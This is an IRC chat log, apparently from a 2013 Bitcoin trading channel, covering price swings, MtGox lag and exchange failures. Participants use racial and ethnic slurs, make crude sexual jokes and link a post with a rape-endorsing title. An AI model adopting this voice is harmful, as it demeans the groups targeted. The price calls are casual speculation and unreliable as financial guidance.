else? Apr 13 01:54:20 "Isn't the confirmation only sent to the new email address? I discovered today that I had mistyped my email when I registered, but since no email confirmation was necessary, I didn't notice it until I was unable to log in today." Apr 13 01:54:33 this is really otherwordly. Apr 13 01:58:46 dunno if id use a disposable email on a site like taht Apr 13 01:59:42 looks shady enough neh ? Apr 13 02:00:03 [MPEX] [S.MPOE] 6735 @ 0.00071364 = 4.8064 BTC [-] Apr 13 02:00:56 yep Apr 13 02:01:46 cue conspiracy theory of them ddosing so they could pull off this "hack" Apr 13 02:02:47 o that;s there already. Apr 13 02:03:22 i guess the most frustrating thing about mtgox incompetence is just how much worse the competitors are. Apr 13 02:04:56 yup Apr 13 02:05:11 ya Apr 13 02:06:02 i mean... i kinda like the bitcoin-central ppl for their bank partner thing. Apr 13 02:06:09 but they gave everyone a shit of a scare just now Apr 13 02:06:22 the russians seem all over the place in a vodka induced frenzy that lasts the week Apr 13 02:06:57 bitfloor is run by a single perambulatory point of failure who is a smart kid with good tech skills but then does takiesque things to walletsd Apr 13 02:07:21 wait Apr 13 02:07:25 Ive heard this story before Apr 13 02:07:42 bitcoinica! Apr 13 02:07:54 wtf this shit was supposed to crash down again Apr 13 02:08:08 Imma have to pull out my gatt on some nigga now Apr 13 02:08:23 MagicalTux is japanese Apr 13 02:08:29 he's not Apr 13 02:08:32 ;;goxlag Apr 13 02:08:36 MtGox lag is 190.632593 seconds. During this time, light travels 0.382025581943 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 13 02:08:42 so you need to pull out your gatt on some gap. Apr 13 02:08:43 just some otaku living the dream of being in japan afaik Apr 13 02:08:44 er, jap Apr 13 02:09:01 pgp just think if the engine weren't 50x faster Apr 13 02:09:04 so, I had a nice racist joke lined upd, and I fudged it. Apr 13 02:09:09 lag would be 10`000 seconds right now. THREE HOURS Apr 13 02:09:19 lol Apr 13 02:09:20 shieeet...i dont be known no nigga i gotta go overseas fo...but i betta not see they ass in the hood... Apr 13 02:09:33 mircea_popescu: man, whats with otakus anyhow Apr 13 02:09:35 ;;seen jurov Apr 13 02:09:36 jurov was last seen in #bitcoin-assets 8 hours, 9 minutes, and 28 seconds ago: yes. just strike - vwap . Apr 13 02:09:37 I enjoy anime as much as the next guy Apr 13 02:09:40 they're like gypos w/o skillz Apr 13 02:09:41 but I have not learned japanaese Apr 13 02:09:43 and gribble ass too Apr 13 02:10:17 seriously, like, otakus want, like, little sisters. those perverts. Apr 13 02:10:28 and never giant robots. Apr 13 02:10:34 rarely is there a giant robot otaku Apr 13 02:10:37 and that makes me sad Apr 13 02:10:59 think Diablo-D3 : a giant mining robot Apr 13 02:11:01 solar powered. Apr 13 02:11:03 I went all in about an hour ago Apr 13 02:11:16 ;;ticker Apr 13 02:11:17 BTCUSD ticker | Best bid: 108.76611, Best ask: 109.00000, Bid-ask spread: 0.23389, Last trade: 109.00000, 24 hour volume: 537506.26393819, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 84.68414 Apr 13 02:11:21 actually, theres a gundam thats _moon_ powered Apr 13 02:11:32 ;;goxlag Apr 13 02:11:32 MtGox lag is 123.359415 seconds. During this time, light travels 0.247210886459 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 13 02:11:51 this is worse than it's been all day - i think... Apr 13 02:12:33 after too many orders go in Apr 13 02:12:51 .01 BTC orders... Apr 13 02:13:47 pgp why guess ? http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 13 02:14:56 nice - never seen this page... Apr 13 02:15:48 its new Apr 13 02:16:27 ;;ticker Apr 13 02:16:28 BTCUSD ticker | Best bid: 106.24000, Best ask: 106.99000, Bid-ask spread: 0.75000, Last trade: 106.24000, 24 hour volume: 539648.85921413, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 84.77927 Apr 13 02:17:00 i take requests for new graphs if anyone's got something in mind Apr 13 02:17:51 overlay of prices from all major exchanges Apr 13 02:18:25 http://jezus.si/graf/dashboards/bitcoin/details/both/ Apr 13 02:18:30 you've got mtgox and bitstamp here Apr 13 02:18:39 i can add others i guess.. Apr 13 02:18:53 what would you want the most? Apr 13 02:18:54 cool Apr 13 02:19:09 width of your anal hole over time Apr 13 02:19:12 prolly BTC-e and bitfloor Apr 13 02:19:24 kakobrekla: hard to measure Apr 13 02:19:25 forget campbx Apr 13 02:19:38 use a measuring stick ? Apr 13 02:20:21 [MPEX] [S.MPOE] 18798 @ 0.00071364 = 13.415 BTC [-] Apr 13 02:20:22 mircea_popescu: i'd hate to do it myself Apr 13 02:20:31 [BTCTC] [ASICMINER-PT] 8 @ 0.77 = 6.16 BTC [+] Apr 13 02:20:34 stacked bar graph of exchange volumes underneath Apr 13 02:21:03 that'd be nice Apr 13 02:21:10 lol a new service is born Apr 13 02:21:41 and keep the name Apr 13 02:21:50 its what i say often when i look at those charts Apr 13 02:22:12 lol Apr 13 02:22:15 http://jezus.si/ Apr 13 02:22:15 the true bitcoin jezuz Apr 13 02:22:20 lol Apr 13 02:22:28 jesus! Apr 13 02:22:37 jesus look at that lag! Apr 13 02:22:39 in other news http://polimedia.us/dtng/c/src/136580751244.jpg Apr 13 02:22:45 jesus bitcoin is 1$! Apr 13 02:22:50 jesus dub got filled! Apr 13 02:23:03 fuck jesus! Apr 13 02:23:43 ;;goxlag Apr 13 02:23:43 MtGox lag is 65.136176 seconds. During this time, light travels 0.130532167403 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 13 02:23:49 mircea_popescu: what's up with adria richards? who won the prize? Apr 13 02:24:07 orkaa http://trilema.com/2013/rape-is-fun-or-lets-fuck-up-adria-richards/#comment-92655 Apr 13 02:24:38 heh. blockchain.info is down of course Apr 13 02:25:09 someone should write a calculator for the relative frequency of an arbitrary selection of critical pieces of bitcoin infrastructure bering online at the same time Apr 13 02:25:15 "any 3 once a week. any 5 once a year" Apr 13 02:25:18 offer it like bets. Apr 13 02:25:22 haha, all n00bs Apr 13 02:25:32 i was trying to convice a friend of mine Apr 13 02:25:38 who does photoshop for a living Apr 13 02:25:45 but she said it was bad karma Apr 13 02:25:46 bah. Apr 13 02:25:55 that'd promote DDoSing to win the bet though, mircea Apr 13 02:25:58 you know a girl ?! Apr 13 02:26:19 :* Apr 13 02:26:20 pizzaman1337 i guess it would. Apr 13 02:29:03 [HAVELOCK] [VTX] 4 @ 0.35 = 1.4 BTC [-] Apr 13 02:29:03 [HAVELOCK] [VTX] 3 @ 0.346 = 1.038 BTC [-] Apr 13 02:29:52 i think this was the only photoshop contest in history with 2.5k usd as top prize Apr 13 02:30:02 it paid out on the 8th, if winner had the sense to sell on the 10th or w/e Apr 13 02:31:41 yeah, the prize was great Apr 13 02:32:00 that's why it's weird only noobs responded Apr 13 02:32:29 dude Apr 13 02:32:29 well... karma i guess Apr 13 02:32:37 just saw a great interview on cnbc Apr 13 02:32:51 larry kudlow was actually fair, and it was balanced as well as mostly accurate Apr 13 02:33:12 good thing. Apr 13 02:33:27 yes Apr 13 02:33:38 he basically ended the segment by saying "i think its the future" Apr 13 02:33:46 all 3 panelists were fans Apr 13 02:33:54 right wingers...basically anti-fed Apr 13 02:34:03 but i think we can all get behind that sentiment Apr 13 02:34:36 i dunno... i don't think the fed per se is the problem. Apr 13 02:34:44 it being run by politicians and idiots more like it. Apr 13 02:34:54 well yes Apr 13 02:35:08 if run by people with a clue it can be a serious strength for the fiat currency. Apr 13 02:35:14 same difference...central bank means control...means idiots and politicians Apr 13 02:35:22 i agree, it would be nice Apr 13 02:35:29 lol Apr 13 02:35:33 i have the convenient example iof romania's cb. Apr 13 02:35:33 just unlikely..absolute power and all that Apr 13 02:35:43 print button is too tempting Apr 13 02:35:46 it's been run as an absolute fief by the same guy for 25 years now Apr 13 02:35:57 and it's been pretty much the one stalwart keeping the country afloat. Apr 13 02:36:11 ;;ticker Apr 13 02:36:13 BTCUSD ticker | Best bid: 110.00000, Best ask: 110.31428, Bid-ask spread: 0.31428, Last trade: 110.31428, 24 hour volume: 546853.70618701, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 85.08767 Apr 13 02:36:16 not all the time, but plenty of times. Apr 13 02:37:23 bitcoinity has been behind all day... Apr 13 02:39:33 he asked ppl to send a mail to gox Apr 13 02:39:54 to refresh more often the api Apr 13 02:40:08 notice's gone tho. did he get threatened ? Apr 13 02:40:47 yeah, but other have more updated data... service is prolly overloaded... Apr 13 02:41:09 i think i found another bug in bitstamp trading engine Apr 13 02:41:24 but whatever Apr 13 02:41:25 what's that? Apr 13 02:41:44 anyone here trying to use cacti for graphs Apr 13 02:43:43 hm Apr 13 02:43:46 dunno Apr 13 02:44:18 looks like someone made a sell priced very low and i managed to scalp him by his ask price somefuckinghow Apr 13 02:44:54 [BTCTC] [COG.F] 1 @ 1.90001 BTC [-] Apr 13 02:45:11 [BTCTC] [COG.F] 1 @ 1.9 BTC [-] Apr 13 02:45:18 huh? Apr 13 02:45:20 orkaa- those graphs use rrd hmm...nice Apr 13 02:45:30 maybe they check to see if there's an order that == that exactly before checking to see if there's a "better" order Apr 13 02:45:35 [BTCTC] [ASICMINER-PT] 1 @ 0.7723 BTC [+] Apr 13 02:46:08 that would be strange indeed... Apr 13 02:46:11 [BTCTC] [ASICMINER-PT] 3 @ 0.7724 = 2.3172 BTC [+] Apr 13 02:46:16 i just ordered pizza Apr 13 02:46:24 they didn't take bitcoin Apr 13 02:46:33 i just cracked open another beer Apr 13 02:47:06 some week, huh? Apr 13 02:47:30 lol some folks lost their ass this week....lmao Apr 13 02:47:47 yep... Apr 13 02:47:58 old saying on wall street: Apr 13 02:48:14 bull can make money, bears can make money... Apr 13 02:48:17 it went like this, price was 95 and bids and asks all around, i placed a buy priced by ask at 95, when page reloaded, i saw in the book order for 85 and my order for 95 and regular orders below Apr 13 02:48:23 pigs just get slaughtered... Apr 13 02:48:28 greed Apr 13 02:48:34 my order got split into two Apr 13 02:48:34 they deserve it too Apr 13 02:48:42 one 95 one 85 Apr 13 02:48:44 !ticker m ^OIX Apr 13 02:48:46 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 13 02:48:58 ;;bc,24hprc Apr 13 02:49:00 84.50 Apr 13 02:49:12 whats the spread like Apr 13 02:49:27 slovenian matching engines... Apr 13 02:49:38 hey Apr 13 02:49:48 got a problem with slovenians? :) Apr 13 02:49:59 jk Apr 13 02:50:13 spent a lot of time the actually Apr 13 02:50:22 love it there Apr 13 02:50:28 but the engines suck! Apr 13 02:50:37 dont the slavs have a lot of problems right now Apr 13 02:50:52 with what Apr 13 02:51:24 neighboring countries?? idk..maybe I'm wrong..gotta read up Apr 13 02:51:31 i mean Apr 13 02:51:39 there are problems but there always are here Apr 13 02:52:18 im just a stupid American, but from what I know about you guys is that you are robust people..strong. Apr 13 02:52:52 problems with terrorism? Apr 13 02:53:02 lol Apr 13 02:53:08 terrorists dont know where slovenia is Apr 13 02:53:16 how will they bomb it Apr 13 02:54:11 heh Apr 13 02:54:23 you know what now i am going to read ..and learn a little. Apr 13 02:54:24 even cnn showed slovakia few years ago talking about slovenia Apr 13 02:54:33 its jurov who will get fucked Apr 13 02:55:13 slevenia is a beautiful country... truly Apr 13 02:55:48 no offense, but i was confused with somalia Apr 13 02:55:56 LMAO Apr 13 02:56:01 =( Apr 13 02:56:01 lol Apr 13 02:56:07 no Apr 13 02:56:15 now THATS funny Apr 13 02:56:24 lemme check here, pgp you sure you werent in somalia/slovakia/somethingelse? Apr 13 02:56:33 ok so there goes my ignorance. Apr 13 02:56:40 slovenia Apr 13 02:56:44 ahh, somalia: Yaaar! Apr 13 02:56:58 wow different contenents Apr 13 02:57:07 used to go to kranjska gora every summer as a kid Apr 13 02:57:14 but apparenlty same planet Apr 13 02:57:25 pgp :) Apr 13 02:57:32 u are lucky pgp.. Apr 13 02:57:35 haha Apr 13 02:57:35 you got roots here? Apr 13 02:57:37 had family in ljubljana.. Apr 13 02:57:47 oh Apr 13 02:57:50 my mother is from Dubrovnik Apr 13 02:57:58 my culteral interaction ends with the Cubans who have taken over South Florida, U.S. Apr 13 02:58:08 lol Apr 13 02:58:27 spent my summers in croatia as kid Apr 13 02:58:37 so you know some slovenian/croatian? Apr 13 02:58:46 but we alway went up to slovenia for a couple of weeks Apr 13 02:58:55 triglave also awesome Apr 13 02:59:02 dober dan, dve pivi prosim ? Apr 13 02:59:17 good day, two beers please Apr 13 02:59:28 haha Apr 13 02:59:30 cool Apr 13 02:59:32 that's about the extent of it though Apr 13 02:59:53 [MPEX] [S.MPOE] 1049 @ 0.00072159 = 0.7569 BTC [+] Apr 13 02:59:57 [MPEX] [S.MPOE] 8163 @ 0.00072244 = 5.8973 BTC [+] Apr 13 03:00:28 my wife LOVES slovenia - spent part of our honeymoon there... Apr 13 03:00:46 hah :) Apr 13 03:00:47 good, so you have a place picked out when you move out of states Apr 13 03:00:49 small world Apr 13 03:01:30 yeah, when I need to flee the oppression of the US federal govt... Apr 13 03:01:36 ;) Apr 13 03:02:06 pgp: have you seen our prime minister? :) Apr 13 03:02:09 http://edition.cnn.com/video/?/video/business/2013/04/10/qmb-intv-slovenian-prime-minister.cnn#/video/business/2013/04/10/qmb-intv-slovenian-prime-minister.cnn Apr 13 03:02:26 it's a good laugh Apr 13 03:03:03 OMG Apr 13 03:03:19 shame on you showing that around! hehe Apr 13 03:03:41 maybe we are in somalia really. Apr 13 03:03:45 hehe Apr 13 03:04:00 hmmm Apr 13 03:04:30 told u i was an ignorant American Apr 13 03:04:48 most of us have little cultural experience or knowledge imo Apr 13 03:04:52 o, 119 gox Apr 13 03:05:11 too bad they didnt mix up slovenia and slovakia this time OgNasty Apr 13 03:05:12 eh Apr 13 03:05:13 orkaa Apr 13 03:05:15 it's going up like, what, $10 an hour? Apr 13 03:05:33 haha what can i say :/ Apr 13 03:05:44 whatt, m.mtgox.com's ssl certificate expired? Apr 13 03:05:57 ;;ticker Apr 13 03:05:58 gesell: that ticket is low pri Apr 13 03:05:58 BTCUSD ticker | Best bid: 118.50000, Best ask: 119.00000, Bid-ask spread: 0.50000, Last trade: 119.00000, 24 hour volume: 559835.24447548, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 85.77785 Apr 13 03:06:17 [MPEX] [S.DICE] 2999 @ 0.00389971 = 11.6952 BTC [+] Apr 13 03:06:29 KRS1: was fine earlier (10 min ago) just not expired Apr 13 03:06:30 kakobrekla: maybe we'll receive the financial help meant for slovakia Apr 13 03:06:43 the time/date could be off on their server Apr 13 03:07:00 or your PC Apr 13 03:07:17 hum Apr 13 03:07:20 ;;bids 100 Apr 13 03:07:20 There are currently 7895.3764 bitcoins demanded at or over 100.0 USD, worth 839129.6212 USD in total. | Data vintage: 102.7756 seconds Apr 13 03:07:35 dunno Apr 13 03:07:38 its getting thin Apr 13 03:07:43 streched Apr 13 03:07:47 wow - rough interview for slovenia PM... Apr 13 03:07:53 ;;bids 0 Apr 13 03:07:54 There are currently 55596669 bitcoins demanded at or over 0.0 USD, worth 14043877.4363 USD in total. | Data vintage: 11.9425 seconds Apr 13 03:07:56 [MPEX] [S.DICE] 1465 @ 0.0039 = 5.7135 BTC [+] Apr 13 03:08:11 im not getting cert error Apr 13 03:08:12 orkaa when did that coime out Apr 13 03:08:12 [MPEX] [S.DICE] 1 @ 0.0039 BTC [+] Apr 13 03:08:24 kakobrekla: few days ago? Apr 13 03:08:29 you know slovenia contributed the word slovenly to the english language ? Apr 13 03:08:31 pgp yeah its retarded Apr 13 03:08:37 apparently w/e mercenaries/whores were really dirty. Apr 13 03:08:38 not even a week i think Apr 13 03:08:55 urlpls mircea_popescu Apr 13 03:09:11 ;;ud slovenly Apr 13 03:09:12 http://www.urbandictionary.com/define.php?term=slovenly | Mar 11, 2003 ... 1. slovenly. adjective describing one who is a mess; see slob. that one heavy kid is simply slovenly. buy slovenly mugs & shirts. by big pun Mar ... Apr 13 03:09:13 http://www.etymonline.com/index.php?term=slovenly Apr 13 03:09:28 [MPEX] [S.MPOE] 10800 @ 0.00071901 = 7.7653 BTC [-] Apr 13 03:09:38 lolz Apr 13 03:09:45 >D Apr 13 03:09:48 its true. :\ Apr 13 03:09:50 lol Apr 13 03:10:22 this is new to me, lol Apr 13 03:10:24 ;;bids 0 Apr 13 03:10:25 There are currently 56099326 bitcoins demanded at or over 0.0 USD, worth 14028685.3638 USD in total. | Data vintage: 33.5869 seconds Apr 13 03:11:10 [MPEX] [S.DICE] 2034 @ 0.0039 = 7.9326 BTC [+] Apr 13 03:11:33 we were all farmers 100 years ago anyway Apr 13 03:11:49 and now Apr 13 03:11:52 btc farmers Apr 13 03:11:54 o.o Apr 13 03:12:05 i wasn;'t a farmer 100 years ago Apr 13 03:12:07 yep the SSL certificate on mount cocks is EXPIRED Apr 13 03:12:16 more like an independent taxation consultant. Apr 13 03:12:36 they actually got the certificate chain correct though Apr 13 03:12:49 expired today Apr 13 03:12:55 i wouldnt login if anyone has an acct there Apr 13 03:13:19 fuckin' rookies Apr 13 03:13:32 gesell: are u in the U.S.? Apr 13 03:14:03 Its possible your time has moved past 12AM and it is now saturday 4/13 for you..its 4/12 Friday here in EST time zone in the U.S. Apr 13 03:14:08 so the cert is still valid for me Apr 13 03:14:51 KRS1: orkaa- those graphs use rrd hmm...nice Apr 13 03:14:54 they also got the key right 2048 as that is now standard Apr 13 03:14:56 it's whisper actually Apr 13 03:15:04 whisper.. Apr 13 03:15:11 modified rrd, little better Apr 13 03:15:28 http://graphite.wikidot.com/whisper Apr 13 03:15:28 oh cool i shall read up on that- thanks Apr 13 03:15:38 awesome ty! Apr 13 03:16:34 oh wow im learning something new about RRD...I knew that about the updates for time passed..just thought thats the way it is..whisper says no...nice. Apr 13 03:16:57 126 Apr 13 03:16:58 I' Apr 13 03:17:25 I'd still rather have something written in C, maybe that will change in the future..not a big fan of python. Apr 13 03:17:46 KRS1: yeah, you could populate history easily with whisper Apr 13 03:17:47 what the fuck is going on - this volatility is crazy Apr 13 03:17:59 ;;ticker Apr 13 03:18:01 BTCUSD ticker | Best bid: 126.46112, Best ask: 127.09385, Bid-ask spread: 0.63273, Last trade: 126.01900, 24 hour volume: 566790.55969661, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 86.22508 Apr 13 03:18:12 this is awesome Apr 13 03:18:18 I saw this coming actually. Apr 13 03:18:21 I went all in at 82-99 Apr 13 03:18:25 I'm no expert.. Apr 13 03:18:26 I saw it too Apr 13 03:18:31 bids were over 13M Apr 13 03:18:37 =D Apr 13 03:18:57 I think pgp called it too Apr 13 03:19:45 remarkable Apr 13 03:20:03 [MPEX] [S.MPOE] 12134 @ 0.00072244 = 8.7661 BTC [+] Apr 13 03:20:18 where does it stop though? Apr 13 03:20:40 130? Apr 13 03:20:43 never Apr 13 03:20:48 round here? Apr 13 03:20:57 I said 39 Apr 13 03:20:59 130 Apr 13 03:21:05 but with this bid support Apr 13 03:21:05 130 today Apr 13 03:21:09 Ill put it this way Apr 13 03:21:14 with gox it stops at 2147483647 prolly Apr 13 03:21:22 12M bids was enough to support a $200 price Apr 13 03:21:27 we are at $14M bids Apr 13 03:21:35 which I only saw 1 day. Apr 13 03:21:40 the day before 266 Apr 13 03:21:40 135 was high after gox reopened... Apr 13 03:23:52 24h gox volume is 569k Apr 13 03:28:17 no fees Apr 13 03:28:19 will do that Apr 13 03:28:24 ;;bids 0 Apr 13 03:28:25 There are currently 56192274 bitcoins demanded at or over 0.0 USD, worth 13877126.7745 USD in total. | Data vintage: 76.0866 seconds Apr 13 03:28:44 [MPEX] [S.MPOE] 5821 @ 0.00072268 = 4.2067 BTC [+] Apr 13 03:30:56 ;;bids 0 Apr 13 03:30:56 There are currently 56189685 bitcoins demanded at or over 0.0 USD, worth 13674205.4139 USD in total. | Data vintage: 80.8205 seconds Apr 13 03:31:34 ;;bids 125 Apr 13 03:31:35 There are currently 3046.9761 bitcoins demanded at or over 125.0 USD, worth 390862.295482 USD in total. | Data vintage: 119.3433 seconds Apr 13 03:31:44 ;;asks 135 Apr 13 03:31:45 There are currently 3233.8751 bitcoins offered at or under 135.0 USD, worth 428171.973792 USD in total. | Data vintage: 0.0209 seconds Apr 13 03:35:19 ;;goxlag Apr 13 03:35:19 MtGox lag is 5.442825 seconds. During this time, light travels 0.0109073603591 AU. You could have sent a bitcoin from Jupiter to its second largest moon, Callisto (0.012567 AU). Apr 13 03:35:56 bugpowder: $39, pgp $42 Apr 13 03:36:05 I think Apr 13 03:36:42 god this is awesome Apr 13 03:36:47 I went so freaking in. Apr 13 03:36:52 at 82-99 Apr 13 03:39:03 pretty amazing, but I think we've seen the local top Apr 13 03:40:53 yeah... i don't think I want to go to sleep long... Apr 13 03:41:18 yep, that's it for today Apr 13 03:42:58 bids in starting at 75 and down - we'll see what the night brings. Apr 13 03:45:19 oh boy - this is crazy volatiltiy Apr 13 03:45:38 just got back to my desk whatd i miss? Apr 13 03:45:42 120?! Apr 13 03:45:58 surprised we got here so quickly Apr 13 03:46:32 up to 130 heading back down Apr 13 03:46:41 down we go Apr 13 03:47:10 getting goxed again... Apr 13 03:47:39 trading 50% off the day avg Apr 13 03:47:43 the bot is certainly loving this lol Apr 13 03:47:59 at this rate by the end of the month all calls will sell for 1btc+ and all puts for over 9000 Apr 13 03:48:13 lol Apr 13 03:48:16 lol Apr 13 03:48:47 ;;goxlag Apr 13 03:48:48 MtGox lag is 58.992681 seconds. During this time, light travels 0.118220672209 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 13 03:50:42 anyway. off to bed. take care all. Apr 13 03:50:53 later Apr 13 03:50:55 nite **** BEGIN LOGGING AT Sat Apr 13 11:01:24 2013 Apr 13 11:02:29 50 TH? Apr 13 11:02:38 oh... I know Apr 13 11:05:01 ;;ticker Apr 13 11:05:02 BTCUSD ticker | Best bid: 119.01001, Best ask: 119.19000, Bid-ask spread: 0.17999, Last trade: 119.19000, 24 hour volume: 519954.94119336, 24 hour low: 54.25000, 24 hour high: 130.00000, 24 hour vwap: 88.43172 Apr 13 11:07:07 ChaangNoi cheebydi coingenuity ColdHardMetal copumpkin Cory Apr 13 11:08:12 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] Apr 13 11:08:15 [BTCTC] [BTC-BOND] 1 @ 0.00998 BTC [-] Apr 13 11:08:19 [BTCTC] [BTC-BOND] 1 @ 0.00997 BTC [-] Apr 13 11:08:21 [BTCTC] [BTC-BOND] 12 @ 0.00997 = 0.1196 BTC [-] Apr 13 11:09:13 if that 50 TH comes on line... oh man, esp if before bfl Apr 13 11:09:40 [BTCTC] [GSDPT] 3 @ 0.00372 = 0.0112 BTC [+] Apr 13 11:09:41 they will ahve like 40% of the network, in fucking sane Apr 13 11:16:42 i thought was only 22th Apr 13 11:19:09 well it varies. Apr 13 11:20:21 -pt? Apr 13 11:20:36 ChaangNoi: who 50Th? Apr 13 11:20:46 asic miner Apr 13 11:20:56 I considering buying shares >_> Apr 13 11:20:56 22? Apr 13 11:21:02 22 TH this month Apr 13 11:21:07 on the 22nd Apr 13 11:21:17 22nd is the soonest it could be up Apr 13 11:21:20 no end time Apr 13 11:21:32 hmm Apr 13 11:21:34 ok Apr 13 11:21:37 and do you have some shares of it? Apr 13 11:21:42 he wrote 22th this month Apr 13 11:21:42 if all goes well, it will be awesome, Apr 13 11:21:52 did he? Apr 13 11:21:55 i guess he meant 22nd Apr 13 11:21:57 i might need to reread it Apr 13 11:22:00 https://bitcointalk.org/index.php?topic=99497.msg1819469#msg1819469 Apr 13 11:22:12 oh its odds are english Apr 13 11:22:36 being in asia i dont even notice, im fluent in engrish Apr 13 11:22:39 i think you're right tho Apr 13 11:22:57 its not done yet, but will be aweosme if it happens Apr 13 11:23:14 takes 2 weeks from the 22nd Apr 13 11:23:25 50 th would be awesome Apr 13 11:23:31 im willing to wait Apr 13 11:23:55 anyway it songkran so i gota go outside, drink beern, and shoot hot girls with waterguns... Apr 13 11:23:56 peace Apr 13 11:24:35 hf! Apr 13 11:24:44 [BTCTC] [BASIC-MINING] 1 @ 0.40997 BTC [-] Apr 13 11:25:03 [HAVELOCK] [SDICE] 1 @ 0.3495 BTC [+] Apr 13 11:34:17 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Apr 13 11:41:33 [BTCTC] [BASIC-MINING] 3 @ 0.40997 = 1.2299 BTC [-] Apr 13 11:50:05 [BTCTC] [BITVPS] 2 @ 0.00031 = 0.0006 BTC [+] Apr 13 11:50:09 [BTCTC] [BITVPS] 2 @ 0.00031 = 0.0006 BTC [+] Apr 13 11:52:42 [BTCTC] [BTC-BOND] 58 @ 0.0101 = 0.5858 BTC [+] Apr 13 11:55:43 [BTCTC] [GSDPT] 1 @ 0.00372 BTC [+] Apr 13 12:09:45 http://trilema.com/2013/the-doctrine-of-total-depravity/ << me on religion. Apr 13 12:11:09 I like the deer metaphor Apr 13 12:16:02 mg down? Apr 13 12:31:01 [HAVELOCK] [SDICE] 2 @ 0.3495 = 0.699 BTC [+] Apr 13 12:32:07 question should be if it's up.... Apr 13 12:35:18 deer in highheels i tell you! Apr 13 12:35:23 [MPEX] [S.MPOE] 4498 @ 0.00070132 = 3.1545 BTC [-] Apr 13 12:36:35 ;;bc,stats Apr 13 12:36:38 Current Blocks: 231122 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 717 blocks | Next Difficulty In About: 4 days, 4 hours, 37 minutes, and 53 seconds | Next Difficulty Estimate: 9033281.16731 | Estimated Percent Change: 17.72815 Apr 13 12:36:49 jolly good Apr 13 12:38:43 CoinBr.iDiff holders should mine hard... otherwise they'll get paid only 0.076 pre share... Apr 13 12:41:01 [HAVELOCK] [SDICE] 3 @ 0.3495 = 1.0485 BTC [+] Apr 13 12:43:46 lol so if anyone's curious re the "hacked mtgox db" : Apr 13 12:43:50 https://blockchain.info/address/1MsB1gxHtrZDBHmSeBbFQchWq2a5aDySsb Apr 13 12:44:04 kid got 1 btc from me, paid some debts, went and dropped the rest on s.dice (lost) Apr 13 12:44:17 he delivered a link to mtgox_db.exe, which obviously. Apr 13 12:58:12 oh hey Apr 13 12:59:27 I charted 2011's bubble on hourly graph and apposed it with current price Apr 13 12:59:35 on Bitcoincharts Apr 13 12:59:46 This is the result: http://i.imgur.com/GfaIyeB.png Apr 13 13:00:40 Current trend is well on it's way to create a perfect bubble chart mirror. Apr 13 13:01:52 One may wonder if it will die out over the next 2-3 months like in 2011 and stabilize at some low level Apr 13 13:02:09 from where we can resume a more stable/steady growth Apr 13 13:02:21 or prop back up again... who knows Apr 13 13:02:36 Would be fun if it kept mirroring 2011 tho Apr 13 13:06:24 [BTCTC] [ASICMINER-PT] 1 @ 0.809 BTC [+] Apr 13 13:32:11 Nam, I'm still worried about a short-term fall Apr 13 13:39:23 well that might occur... Apr 13 13:39:35 still, I expect the price to go downward slower Apr 13 13:40:01 bitcoin24 closed? details? Apr 13 13:40:16 how did i not hear of this lol Apr 13 13:41:58 ChaangNoi: unlicensed exchange, polish account suspended under AML suspicion Apr 13 13:42:03 hot wallet empty Apr 13 13:42:10 hopefully bitcoins are safe Apr 13 13:42:16 http://stackoverflow.com/questions/15026825/php-mysql-how-to-prevent-two-requests-update Apr 13 13:42:22 not relevant imo Apr 13 13:42:28 oh wow thanks ezdiy Apr 13 13:42:31 that sucks Apr 13 13:42:54 damientrog: that race indeed existed during aug-feb though :) Apr 13 13:43:05 :) Apr 13 13:43:51 I just transferred a decent amount of coins back to my wallet, but it didn't go through Apr 13 13:43:57 just before it closed Apr 13 13:44:04 yup Apr 13 13:44:09 the place was going apeshit though Apr 13 13:44:10 supposed hot wallet empty Apr 13 13:44:21 worst case - because of the sql bug, lots of coins were stolen Apr 13 13:44:29 and simon didnt bother to announce it Apr 13 13:44:53 and now will play the victim "aaand its gone, coz of evil german/polish govt" Apr 13 13:44:56 growing pains of the Bitcoin community Apr 13 13:45:05 ezdiy: wtf Apr 13 13:45:34 I always am fearful when transferring around fortunes in BTC to these exchanges Apr 13 13:45:49 I just spread my risk Apr 13 13:45:51 but still Apr 13 13:45:56 ya Apr 13 13:46:05 anything besides mtgox is hard to trust :( Apr 13 13:46:08 they are usually 1-guy operations Apr 13 13:46:36 ezdiy: I hope that guy isn't running an exchange right now Apr 13 13:47:17 hey Apr 13 13:47:22 it happened in the past Apr 13 13:47:36 if it weren't for the fact these guys usually here, I wouldn't trust it one bit Apr 13 13:47:36 and i *DONT* believe in hacks, until substantial evidence is shown :) Apr 13 13:48:11 simple explanation - if you're not making enough profit and you're holding assets you'd make in 5 years at current rate, its simpler to screw the customers Apr 13 13:50:07 this line is hilarious on btct.co: "Fundamentally, the purpose of this stock market simulation game … " Apr 13 13:50:30 hey guys, don't blame me it was only a game Apr 13 13:50:52 but still a great site though Apr 13 13:55:21 some asset issuer on its sister exchange litecon-global pulled it out already Apr 13 13:55:35 "just a game, we took it, sorry" Apr 13 13:56:48 I wonder how many people realise these dangers Apr 13 13:57:31 what danger, p2p distributed clown-based exchanges are the future! Apr 13 13:57:32 ;;bc,convert eur Apr 13 13:57:33 1 BTC = 116.01200 U.S. dollars = 88.700971 Euros Apr 13 13:57:44 hehe Apr 13 13:58:10 I store all my coins in clown-based storage Apr 13 14:03:18 think we'll see an amplified weekend dip? Apr 13 14:03:53 my cat says no Apr 13 14:04:03 i bought a significant amount of asicminer shares today Apr 13 14:04:11 my first real investment in bitcoin assets Apr 13 14:04:24 you couldve done much worse Apr 13 14:06:27 ;;nethash Apr 